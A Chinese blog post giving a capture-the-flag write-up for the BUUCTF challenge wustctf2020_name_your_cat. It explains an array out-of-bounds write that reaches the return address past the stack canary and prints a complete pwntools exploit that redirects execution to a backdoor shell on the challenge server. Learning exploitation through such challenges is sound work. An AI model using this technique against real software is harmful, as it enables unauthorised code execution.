[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)

最新推荐文章于 2022-10-03 11:01:52 发布
最新推荐文章于 2022-10-03 11:01:52 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/114673240
版权

wustctf2020_name_your_cat

附件

步骤

  1. 例行检查,32位程序,开启了canary和nx
    在这里插入图片描述

  2. 本地试运行一下看看大概的情况
    在这里插入图片描述

  3. 32位ida载入,在检索字符串的时候发现了后门
    在这里插入图片描述
    主要函数
    在这里插入图片描述
    Namewhich()
    在这里插入图片描述

利用思路:

由于存在数组越界的情况,所以我们能够覆写buf后的内容,又由于存在canary,所以我们只能通过偏移定为到ret,覆写掉ret,将它改为backdoor

利用过程:

ida看栈布局找偏移
在这里插入图片描述
这么看体会不到的话gdb动调找一下偏移
程序进入NameWhich的情况,传入的参数地址是0xffffcf34
在这里插入图片描述
传入一个参数后,地址变成了0xffffcf3c
在这里插入图片描述
来到返回地址
在这里插入图片描述
他们相差cf6c-cf34=56,一个参数占8位,中间相差7个参数
因此我们可以for循环执行到第5次的时候,在输入name for which的时候输入7,让它定位到ret的地址上,覆写成backdoor即可。

完整exp:

from pwn import *

p=remote("node3.buuoj.cn",28477)
#p=process('./wustctf2020_name_your_cat')
elf=ELF('./wustctf2020_name_your_cat')

shell_addr=0x80485cb

p.sendlineafter('Name for which?\n>','1')
p.sendlineafter("Give your name plz: ",'A')

p.sendlineafter('Name for which?\n>','2')
p.sendlineafter("Give your name plz: ",'B')

p.sendlineafter('Name for which?\n>','3')
p.sendlineafter("Give your name plz: ",'C')

p.sendlineafter('Name for which?\n>','4')
p.sendlineafter("Give your name plz: ",'D')

p.sendlineafter('Name for which?\n>','7')
p.sendlineafter("Give your name plz: ",p32(shell_addr))

p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
2019全国大学生信息安全竞赛pwn[数组越界任意,doublefree,ret2dl-resolve]
九层台
04-25 1758
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读一...
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
wustctf2020_name_your_cat
z1r0的博客
01-17 633
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
PWN入门之数组越界
weixin_44681716的博客
05-04 2196
实验目的 利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖的值。 通过这次实验,使我们掌握利用数组越界去继续泄露的方法。 实验文件 链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ 提取码:m6ra 我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。 实验步骤 首先介绍一下数组越界的原理: 数组越界分两种:一...
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1136
CISCN2021pwn pwny(数组越界,劫持exit_hook)
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
pwn信号发生器的源代码和仿真图,该程序可实现频率可调,占空比可调的pwm信号
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
单片机脉冲发生器pwn,有proteus仿真图,及c代码
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 373
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,个c程序跑一下就出来了 #include<stdio.h> int .
2021_9_20_name_your_cat
m0_51187558的博客
09-22 240
前言 每日一题的第三题,主要是对于上一道题的一个巩固和补充,涉及到了一点函数执行流的控制,但是总体还是比较简单。 漏洞点分析 在上一道题目里我们遇见了一个溢出数组变量的内存空间的漏洞,一般来说我们称这种类型漏洞为数组越界漏洞(当然,漏洞的俗名只是方便大家归类整理与交流,自己的另起说法也是可行的)。 但是稍微回想一下,上一道题的关键是通过数组越界修改v2变量的值,程序设定好了,只要v2被更改为这个值,我们就能获得flag。 然而在上上道,也就是nc中,我们提到过,想要做出pwn题,需要想方设法使程序执行sys
CTF数组越界漏洞内存布局简析
BadRer的博客
06-03 1801
今天为大家带来一篇关于数组越界漏洞原理的分析,并且结合CTF中的实例给大家讲解下。由于自己也是第一次接触,如若有不到位的地方,还希望各位评论补充我会及时的改正。总体来说数组越界其实和栈溢出差不多。。。 推荐一篇文章 http://blog.csdn.net/human_evolution/article/details/40752047 基本上把数组越界的原理给讲清楚了。在这里呢,我主要是结合
数组下标越界
zszcr的博客
04-05 2343
原理:因为c语言不会检测数组下标,所以如果我们给数组一个超出它大小的下标,就会照成数组越界。如果是想数组入数据的话,就会造成数据入到不属于数组的地方,或者说如果读取数据的话,就会读取到别的地方的数据。因为数组地址是自低往高增长,而栈的地址是自高向下降低,所以如果我们将数组下标根据栈内的空间的分布,设置为特定的值,就可以修改或者是查看我们想要查看的地址的值。比如将返回地址设置成我们想要调用函数...
数组越界溢出
weixin_30778805的博客
05-08 335
数组不要过界,不要溢出,否则可能导致其他变量莫名改变。。 定义了一个数组,其中在赋值的时候,用的是宏定义,导致不小心超出了范围, 但程序没有报错, 转载于:https://www.cnblogs.com/chulin/p/9007265.html...
c语言短整型范围越界,[原创]数组越界之入门向
weixin_33959449的博客
05-25 674
前言:做题时候遇到的第一道数组越界pwn题,其中负数利用有一块地方刚开始一直弄不太明白,发帖求助了一下,在此感谢holing大佬的帮助。介绍:0x1. 数组越界原理:0x1. 堆中的数组越界:因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界...
236页PPT丨制药企业数字化转型项目顶层规划方案 .pptx
最新发布
06-26
236页PPT丨制药企业数字化转型项目顶层规划方案 .pptx
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值